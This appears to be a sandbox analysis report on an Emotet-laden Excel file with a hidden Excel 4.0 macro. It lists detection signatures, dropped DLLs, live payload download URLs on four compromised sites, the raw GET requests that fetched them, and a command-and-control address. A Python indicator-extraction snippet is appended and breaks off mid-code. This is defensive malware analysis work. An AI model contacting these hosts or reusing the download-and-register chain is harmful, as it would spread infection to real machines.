Windows Analysis Report
Datei_26744565.xls

Overview

General Information

Sample Name: Datei_26744565.xls
Analysis ID: 632101
MD5: a8777e5596125dadbb7563052324e1bb
SHA1: bbd66379044f8d49541a7ae6d793b44a0aea3b49
SHA256: cbd5b0454385324baee6fc97124c8656ea55f4272f7365e2fbcf570470cba4e6
Tags: xls

Detection

Hidden Macro 4.0, Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Office process drops PE file
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Downloads executable code via HTTP
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Drops PE files to the user directory
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection

Source: Datei_26744565.xls ReversingLabs: Detection: 39%
Source: http://learnviaonline.com/wp-admin/qGb/ Avira URL Cloud: Label: malware
Source: http://milanstaffing.com/images/D4TRnDubF/ Avira URL Cloud: Label: malware
Source: http://kolejleri.com/wp-admin/REvup/ Avira URL Cloud: Label: malware
Source: kolejleri.com Virustotal: Detection: 11%
Source: milanstaffing.com Virustotal: Detection: 6%
Source: learnviaonline.com Virustotal: Detection: 8%
Source: stainedglassexpress.com Virustotal: Detection: 5%
Source: http://learnviaonline.com/wp-admin/qGb/ Virustotal: Detection: 14%
Source: http://milanstaffing.com/images/D4TRnDubF/ Virustotal: Detection: 13%
Source: http://kolejleri.com/wp-admin/REvup/ Virustotal: Detection: 18%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll Metadefender: Detection: 28%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll ReversingLabs: Detection: 58%
Source: C:\Users\user\uxevr1.ocx ReversingLabs: Detection: 58%
Source: C:\Users\user\uxevr2.ocx ReversingLabs: Detection: 58%
Source: C:\Users\user\uxevr3.ocx ReversingLabs: Detection: 58%
Source: C:\Users\user\uxevr4.ocx Metadefender: Detection: 28%
Source: C:\Users\user\uxevr4.ocx ReversingLabs: Detection: 60%
Source: C:\Windows\System32\AnDDvm\lwQjfM.dll (copy) ReversingLabs: Detection: 58%
Source: C:\Windows\System32\IvkabqgmpEJ\fEKh.dll (copy) Metadefender: Detection: 28%
Source: C:\Windows\System32\IvkabqgmpEJ\fEKh.dll (copy) ReversingLabs: Detection: 60%
Source: C:\Windows\System32\MreGm\Zazriwdkuo.dll (copy) ReversingLabs: Detection: 58%
Source: C:\Windows\System32\RrQZitdNyvCFEhe\pDnxsvRJXW.dll (copy) ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll Joe Sandbox ML: detected
Source: C:\Users\user\uxevr3.ocx Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll Joe Sandbox ML: detected
Source: C:\Users\user\uxevr1.ocx Joe Sandbox ML: detected
Source: C:\Users\user\uxevr4.ocx Joe Sandbox ML: detected
Source: C:\Users\user\uxevr2.ocx Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose, 4_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose, 6_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose, 8_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose, 10_2_000000018000BEF0

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: Jf8[1].dll.0.dr
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Source: global traffic DNS query: name: learnviaonline.com
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 103.171.181.223:80

Networking

Source: C:\Windows\System32\regsvr32.exe Network Connect: 165.22.73.229 8080
Source: Joe Sandbox View ASN Name: MYLOC-ASIPBackboneofmyLocmanagedITAGDE
Source: Joe Sandbox View IP Address: 103.171.181.223
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 23 May 2022 07:50:02 GMTServer: ApacheCache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Mon, 23 May 2022 07:50:03 GMTContent-Disposition: attachment; filename="Jf8.dll"Content-Transfer-Encoding: binarySet-Cookie: 628b3cab47229=1653292203; expires=Mon, 23-May-2022 07:51:03 GMT; Max-Age=60; path=/Last-Modified: Mon, 23 May 2022 07:50:03 GMTContent-Length: 371200Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 23 May 2022 07:50:10 GMTServer: ApacheX-Powered-By: PHP/7.3.33Cache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Mon, 23 May 2022 07:50:10 GMTContent-Disposition: attachment; filename="1Cb5zOjLgWGDemz55C5.dll"Content-Transfer-Encoding: binarySet-Cookie: 628b3cb29fefc=1653292210; expires=Mon, 23-May-2022 07:51:10 GMT; Max-Age=60; path=/Last-Modified: Mon, 23 May 2022 07:50:10 GMTContent-Length: 371200X-Content-Type-Options: nosniffVary: User-AgentKeep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKConnection: Keep-AliveKeep-Alive: timeout=5, max=100x-powered-by: PHP/7.0.33set-cookie: 628b3cb8b9778=1653292216; expires=Mon, 23-May-2022 07:51:16 GMT; Max-Age=60; path=/cache-control: no-cache, must-revalidatepragma: no-cachelast-modified: Mon, 23 May 2022 07:50:16 GMTexpires: Mon, 23 May 2022 07:50:16 GMTcontent-type: application/x-msdownloadcontent-disposition: attachment; filename="T35PENELLOsp.dll"content-transfer-encoding: binarycontent-length: 371200date: Mon, 23 May 2022 07:50:16 GMTserver: LiteSpeedvary: User-Agent
Source: global traffic HTTP traffic detected: GET /wp-admin/qGb/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: learnviaonline.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-admin/REvup/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kolejleri.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /classes/05SkiiW9y4DDGvb6/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: stainedglassexpress.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /images/D4TRnDubF/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: milanstaffing.comConnection: Keep-Alive
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 165.22.73.229:8080
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.com
Source: regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/
Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1214603254.00000000002DC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1215024269.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214961522.0000000002F30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1215024269.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000004.00000002.1215037206.0000000002E9C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1215024269.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1215024269.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: regsvr32.exe, 00000004.00000002.1214540474.00000000001B6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.982406822.00000000001B6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1214943088.0000000002EE0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1214675657.000000000030B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214558959.0000000000256000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: 77EC63BDA74BD0D0E0426DC8F80085060.4.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 00000004.00000002.1214540474.00000000001B6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.982406822.00000000001B6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1214540936.0000000000124000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214558959.0000000000256000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme
Source: regsvr32.exe, 00000008.00000002.1214603254.00000000002DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme.
Source: regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoc
Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1215024269.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1214603254.00000000002DC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1215024269.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1214603254.00000000002DC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1215024269.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214961522.0000000002F30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214961522.0000000002F30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1215024269.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: regsvr32.exe, 00000004.00000002.1214570294.00000000001DE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.982445860.00000000001DE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1214569548.000000000015A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1214649654.0000000000305000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214621472.0000000000295000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://165.22.73.229/
Source: regsvr32.exe, 0000000A.00000002.1214621472.0000000000295000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://165.22.73.229/E&
Source: regsvr32.exe, 00000006.00000002.1214569548.000000000015A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://165.22.73.229/d
Source: regsvr32.exe, 00000004.00000002.1214570294.00000000001DE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.982445860.00000000001DE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1214943088.0000000002EE0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214621472.0000000000295000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://165.22.73.229:8080/
Source: regsvr32.exe, 00000008.00000002.1214675657.000000000030B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://165.22.73.229:8080/0
Source: regsvr32.exe, 00000008.00000002.1214675657.000000000030B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://165.22.73.229:8080/4
Source: regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.co
Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1214603254.00000000002DC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1215024269.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll Jump to behavior
Source: unknown DNS traffic detected: queries for: learnviaonline.com
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180017C8C InternetReadFile, 4_2_0000000180017C8C
Source: global traffic HTTP traffic detected:
    GET /wp-admin/qGb/ HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: learnviaonline.com
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /wp-admin/REvup/ HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: kolejleri.com
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /classes/05SkiiW9y4DDGvb6/ HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: stainedglassexpress.com
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /images/D4TRnDubF/ HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: milanstaffing.com
    Connection: Keep-Alive
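The four GET requests above are the stage-two downloads issued from the Excel 4.0 macro sheet (each to a different site, with the urlmon/Internet Explorer User-Agent that a URLDownloadToFileA call produces), and the https://165.22.73.229 strings in regsvr32.exe memory are the C2 endpoint of the loaded DLL. The text export of this report prints each captured request on a single line with the CRLF separators removed, and the memory strings carry trailing bytes (E&, d, 0, 4) that are not part of the URL, so turning the report into a clean indicator list needs a little parsing. The Python below is an added example, not part of the report or of any sandbox tooling: it embeds the report's own lines in that raw form and recovers the download URLs and the C2 (ip, port) pairs; the memory-dump lists after "Source:" in the string lines are trimmed to "..." for brevity.

```python
import re
from dataclasses import dataclass, field

# Lines copied from this report.  The text export prints each request on one
# line with the CRLF between headers removed, so headers run together.
_UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; "
       ".NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
       "Media Center PC 6.0; .NET4.0C; .NET4.0E)")
_COMMON = f"Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: {_UA}Host: "
REPORT_LINES = [
    f"Source: global traffic HTTP traffic detected: GET /wp-admin/qGb/ HTTP/1.1{_COMMON}learnviaonline.comConnection: Keep-Alive",
    f"Source: global traffic HTTP traffic detected: GET /wp-admin/REvup/ HTTP/1.1{_COMMON}kolejleri.comConnection: Keep-Alive",
    f"Source: global traffic HTTP traffic detected: GET /classes/05SkiiW9y4DDGvb6/ HTTP/1.1{_COMMON}stainedglassexpress.comConnection: Keep-Alive",
    f"Source: global traffic HTTP traffic detected: GET /images/D4TRnDubF/ HTTP/1.1{_COMMON}milanstaffing.comConnection: Keep-Alive",
]

# "String found in binary or memory" lines from the same report; the list of
# memory dumps after "Source:" is trimmed to "..." here.  The trailing junk
# (E&, d, 0, 4) is adjacent memory the string extractor swept up.
STRING_LINES = [
    "Source: regsvr32.exe, ... String found in binary or memory: https://165.22.73.229/",
    "Source: regsvr32.exe, ... String found in binary or memory: https://165.22.73.229/E&",
    "Source: regsvr32.exe, ... String found in binary or memory: https://165.22.73.229/d",
    "Source: regsvr32.exe, ... String found in binary or memory: https://165.22.73.229:8080/",
    "Source: regsvr32.exe, ... String found in binary or memory: https://165.22.73.229:8080/0",
    "Source: regsvr32.exe, ... String found in binary or memory: https://165.22.73.229:8080/4",
    "Source: regsvr32.exe, ... String found in binary or memory: http://ocsp.comodoca.com05",
]

# Header names seen in these requests.  Longer names come first so that
# "Accept-Encoding" is not split into "Accept" + "-Encoding".
HEADER_NAMES = ["Accept-Encoding", "Accept", "UA-CPU", "User-Agent", "Host", "Connection"]
_NAMES = "|".join(re.escape(h) for h in HEADER_NAMES)
# A header value runs until the next known header name or the end of the line.
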